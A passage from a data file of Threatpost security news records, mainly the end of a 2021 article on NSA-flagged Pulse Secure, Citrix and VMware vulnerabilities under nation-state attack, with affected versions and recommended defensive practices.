federal agency [was attributed to](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>) exploitation of the bug. \u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability \u2013 CVE-2019-11510 \u2013 in Pulse Secure,\u201d according to CISA\u2019s alert at the time. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\n## **CVE-2019-19781**\n\nThis critical directory-traversal vulnerability in the Citrix Application Delivery Controller (ADC) and Gateway that can allow remote code-execution. It was first disclosed as a zero-day in December 2019, after which Citrix [rolled out patches](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) amidst dozens of proof-of-concept exploits and skyrocketing exploitation attempts.\n\nIt affects Citrix ADC and Gateway versions before 13.0.47.24, 12.1.55.18, 12.0.63.13, 11.1.63.15 and 10.5.70.12 and SD-WAN WANOP 4000-WO, 4100-WO, 5000-WO, and 5100-WO versions before 10.2.6b and 11.0.3b.\n\n## **C****VE-2020-4006**\n\nAnd finally, a command-injection vulnerability in VMWare Workspace One Access, Access Connector, Identity Manager and Identity Manager Connector allows arbitrary command execution on underlying operating systems. A successful exploit does, however, require valid credentials to the configurator admin account, so it must be chained with another bug to use it.\n\nNonetheless, in December the NSA [warned that](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) foreign adversaries were zeroing in on exploiting the flaw, despite patches rolling out just days earlier. State actors were using the bug to pilfer protected data and abuse shared authentication systems, it said.\n\nIt affects VMware One Access 20.01 and 20.10 on Linux, VMware Identity Manager 3.3.1 \u2013 3.3.3 on Linux, VMware Identity Manager Connector 3.3.1 \u2013 3.3.3 and 19.03, VMware Cloud Foundation 4.0 \u2013 4.1, and VMware Vrealize Suite Lifecycle Manager 8.x.\n\n## **How Can I Protect Against Cyberattacks?**\n\nThe NSA recommended several best practices to protect organizations from attack:\n\n * Update systems and products as soon as possible after patches are released.\n * Assume a breach will happen; review accounts and leverage the latest eviction guidance available.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in client device configurations.\n * Adopt a mindset that compromise happens: Prepare for incident response activities.\n\n\u201cIf publicly known, patchable exploits still have gas in the tank, this is just an indictment against the status-quo disconnect between many organizations\u2019 understanding of risk and basic IT hygiene,\u201d Tim Wade, technical director on the CTO team at Vectra, told Threatpost. \u201cThe unfortunate reality is that for many organizations, the barrier to entry into their network continues to be low-hanging fruit which, for one reason or another, is difficult for organizations to fully manage.\u201d\n\nHe added, \u201cThis underscores why security leaders should assume that for all the best intentions of their technology peers, compromises will occur \u2013 their imperative is to detect, respond and recover from those events to expel adversaries before material damage is realized.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-16T18:10:09", "type": "threatpost", "title": "NSA: 5 Security Bugs Under Active Nation-State Cyberattack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T18:10:09", "id": "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "href": "https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:02:30", "description": "It\u2019s been nearly two months since Oracle patched the [CVE-2012-1723 Java vulnerability](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1723>), a serious remote pre-authentication flaw that\u2019s present in the Java Runtime Environment. It\u2019s taken a little time, but the attacker community has decided that this bug deserves some serious attention, and as a result, attacks trying to exploit it